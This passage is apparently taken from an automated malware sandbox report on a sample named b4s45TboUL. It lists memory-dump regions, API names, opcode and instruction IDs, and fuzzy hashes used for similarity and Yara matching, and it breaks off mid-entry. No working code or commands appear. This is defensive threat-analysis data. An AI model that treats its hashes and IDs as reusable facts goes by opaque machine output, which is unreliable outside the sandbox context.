                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SystemTimelstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 62757014-0
                                                                                                • Opcode ID: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                                                                                • Instruction ID: 470bfa94025adedc24e37c5607c38d4270d2eadb7b78e810e6eac55b0552b998
                                                                                                • Opcode Fuzzy Hash: cce225ff94706f9395c058c90c0b5c4f8768ee8627e86dd20290b192b3a29a40
                                                                                                • Instruction Fuzzy Hash: 1211D331D011089FCB04EFA9D891AEE77BAEF58314F44C05EF41667185EF386984CBA6
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001D1D8), ref: 0041D21F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                                                                                • Instruction ID: 17ba3a89fab13532ca0ccd526d59b343203315732a49a137553a0870c120f9dd
                                                                                                • Opcode Fuzzy Hash: 8b874fd89f0884f437ce1ddba4ceeb6b336b4db7298e80d3acb37d3ef468addd
                                                                                                • Instruction Fuzzy Hash: B19002F465151096860457755C4D5857A905E8D64675185A1AC06D4054DBA840409529
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: h(a
                                                                                                • API String ID: 0-2400461097
                                                                                                • Opcode ID: 71869a9137419463603cde280ee188053e9a13460f42e43a2e0fa2ffe69ea0d1
                                                                                                • Instruction ID: f5bca11cc97640b6e875e2d2b4b9a879d1eb82f3f63dc60f1c56b61e4975c6c7
                                                                                                • Opcode Fuzzy Hash: 71869a9137419463603cde280ee188053e9a13460f42e43a2e0fa2ffe69ea0d1
                                                                                                • Instruction Fuzzy Hash: 6C91A03090C2918BEB05CEA8D4C2B59BBB2AF85308F6CC199DC499F38AC775D855D791
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: bua
                                                                                                • API String ID: 0-3993766197
                                                                                                • Opcode ID: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
                                                                                                • Instruction ID: 2dbdb228c3cab7288b2b063f09620b15a0131b4afe136593b5dc23e7c01abf69
                                                                                                • Opcode Fuzzy Hash: 633315b2ebd987899b0574c5a9c2535cb517164b27f88ba4281f08561b9dd3a8
                                                                                                • Instruction Fuzzy Hash: BF112A74A0434A8FCB04CF6DC5C058ABBE4FF88265F248529ED48CB301D374E991CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cdee5f106130f9c003e98ff858ec0a85d67dd58a6e597a66ac0da64aa36c3f40
                                                                                                • Instruction ID: 64511e9e7bc8a538c31c2dec79f9366059c8cda353a3f8e3c319e5c84b16a323
                                                                                                • Opcode Fuzzy Hash: cdee5f106130f9c003e98ff858ec0a85d67dd58a6e597a66ac0da64aa36c3f40
                                                                                                • Instruction Fuzzy Hash: A382EE74A442598FDB10DFA8C490B9EBBF6BF89308F60842DD899AB345DB74E845CF41
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e1eae3699fac779f8409605dc730b392d15f84a2fba1f369ada27ba1e5db84d5
                                                                                                • Instruction ID: bf890a49f948a95996c0874b8a48064969d64c08d11fd484a8260e1bd552f906
                                                                                                • Opcode Fuzzy Hash: e1eae3699fac779f8409605dc730b392d15f84a2fba1f369ada27ba1e5db84d5
                                                                                                • Instruction Fuzzy Hash: 4062D2789052298BDB25CF58C9807C9B7F1BB49314F2589EAD848AB351D774EEC1CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dc8165478dc3925e22261f760ae13faed563116b50f459b7ee06c786a9039f64
                                                                                                • Instruction ID: 9d8ba64b78ef50a58b18041be0aa597e26323e47a4c979711dc9b8f68f915d3c
                                                                                                • Opcode Fuzzy Hash: dc8165478dc3925e22261f760ae13faed563116b50f459b7ee06c786a9039f64
                                                                                                • Instruction Fuzzy Hash: C362D774A05269CFDBA0CF68C880B89B7B1BB48308F2585E9D84DAB345D731EE95CF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0254488f8c32c048f82df82e9c4d2b6827cb02c68cc164462147c6d21207eb1b
                                                                                                • Instruction ID: 7acb60ce99df90a8d4815b3c5ed6ca94b274d674d137866997d0d1df3706a504
                                                                                                • Opcode Fuzzy Hash: 0254488f8c32c048f82df82e9c4d2b6827cb02c68cc164462147c6d21207eb1b
                                                                                                • Instruction Fuzzy Hash: 91525970A14269CFEBA4CF29C880B89B7B1BB49314F2481D9D84DAB342D731EE95DF51
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9bdc4de420c9a34da6dbbdb2a0fec3051ffd46b06f926d1bc85fdc29c1c1a196
                                                                                                • Instruction ID: 7d4db4bf54e914a96f89eafcb2e9a7ace034c4f41d3990f097a4e13efd09d89f
                                                                                                • Opcode Fuzzy Hash: 9bdc4de420c9a34da6dbbdb2a0fec3051ffd46b06f926d1bc85fdc29c1c1a196
                                                                                                • Instruction Fuzzy Hash: AF02F471E042268FDB11CF69D8907ABB7F2AF9A344F16831AE815B7750D770AD4287D0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6aad93336734f3784abd80bfb6c49ae7c58a0e4fc94fbcedd4864dc100b082a5
                                                                                                • Instruction ID: 19f4867394c01e4d8c9e316edce12a8cee81f65b8fdb4e74c3c7cf9959f5a621
                                                                                                • Opcode Fuzzy Hash: 6aad93336734f3784abd80bfb6c49ae7c58a0e4fc94fbcedd4864dc100b082a5
                                                                                                • Instruction Fuzzy Hash: 19121678A0525ADFCB05CFA9E480A8DB7F1BF59318F21C165E815AB360D774EC82CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: da665eaadf7d319805ad7cb84820fb41edc19a4488f67fc0ebda8acc5614babe
                                                                                                • Instruction ID: d69fdf5d9c806f7edba15bc314e05e9f3cdc1a2150cd31b96f5dbe42976c28ee
                                                                                                • Opcode Fuzzy Hash: da665eaadf7d319805ad7cb84820fb41edc19a4488f67fc0ebda8acc5614babe
                                                                                                • Instruction Fuzzy Hash: C8022674A05245CFDF49CFA8C590A9DBBF2AF88318F25C069E815AB345DB36E891CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106583259.000000006CFA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CFA0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106544141.000000006CFA0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106678879.000000006D047000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106698996.000000006D049000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6cfa0000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0c98bd50077a4cc96d8561bb51850515ce665a11bc5af43045e294dd400ceaeb
                                                                                                • Instruction ID: 43b288e406d1fe422bbffe66f73235413b68469b9b47edef79eb9cb7522f843f
                                                                                                • Opcode Fuzzy Hash: 0c98bd50077a4cc96d8561bb51850515ce665a11bc5af43045e294dd400ceaeb
                                                                                                • Instruction Fuzzy Hash: 79B1B172A083519BD308CF69C89075BF7E2EFC8314F1AC93EB89997681D774D9458B82
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f84a17d7b7162c7ad0fc99589cc7edcc1ded7c59e24e1e1c13f4451c940a323f
                                                                                                • Instruction ID: 1edb749c10e8e23cb8f7e7bf4bb2cb1e8f1af70184db1bb38d613eb8a6dbdcd7
                                                                                                • Opcode Fuzzy Hash: f84a17d7b7162c7ad0fc99589cc7edcc1ded7c59e24e1e1c13f4451c940a323f
                                                                                                • Instruction Fuzzy Hash: AAC1E4B4E443598FDB00DFA8C48468DBBF1BF88318F25C929E8599B365D774D886CB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fe21b6bd1be3da99cafcdecf9004352efc83787c55788eb666b68aab9e3209ea
                                                                                                • Instruction ID: 3210fe7c149a8df005d633ee7ab480dd5827b519719accc1fa5954128a221567
                                                                                                • Opcode Fuzzy Hash: fe21b6bd1be3da99cafcdecf9004352efc83787c55788eb666b68aab9e3209ea
                                                                                                • Instruction Fuzzy Hash: 2591C371E44266CBEB199E98C8807597AF2ABC8348F35C5E9C45A9B351E771CD82CB80
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e8a6c36cca57d6cb3f3a801d7d86d6ae23e9f5d0fd98d73f71e916c8d54b9c0
                                                                                                • Instruction ID: 878cb23af3a6350bf954d4178c5a2acd4654a5c4dc0d4d629278b81f8bee302c
                                                                                                • Opcode Fuzzy Hash: 3e8a6c36cca57d6cb3f3a801d7d86d6ae23e9f5d0fd98d73f71e916c8d54b9c0
                                                                                                • Instruction Fuzzy Hash: C0C129B1A056488FDB04CFA9C88578EBBF1BF89304F148269D858DB35AD774D949CB81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 37ab0d498e6869f1248f18525f82ea8c3addd781597051de19eda25eeb30940a
                                                                                                • Instruction ID: 382c8684cf9a3560b476f3c0be3439e748f519b75ac4ebfb263bed86336ac9cf
                                                                                                • Opcode Fuzzy Hash: 37ab0d498e6869f1248f18525f82ea8c3addd781597051de19eda25eeb30940a
                                                                                                • Instruction Fuzzy Hash: 1A319EB8508755DBDB04DF58C4A06AABBF0FF89324F24C95EEAA84B351D334C451CB42
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 87a3deadb9d58158e10bd0d13bb27e12a41fb1a60a956b8ee286a92c2821ca3b
                                                                                                • Instruction ID: 28e1a2f4ec7288b6cc9663568d88951edc36634af267e108b581ab28c3048e35
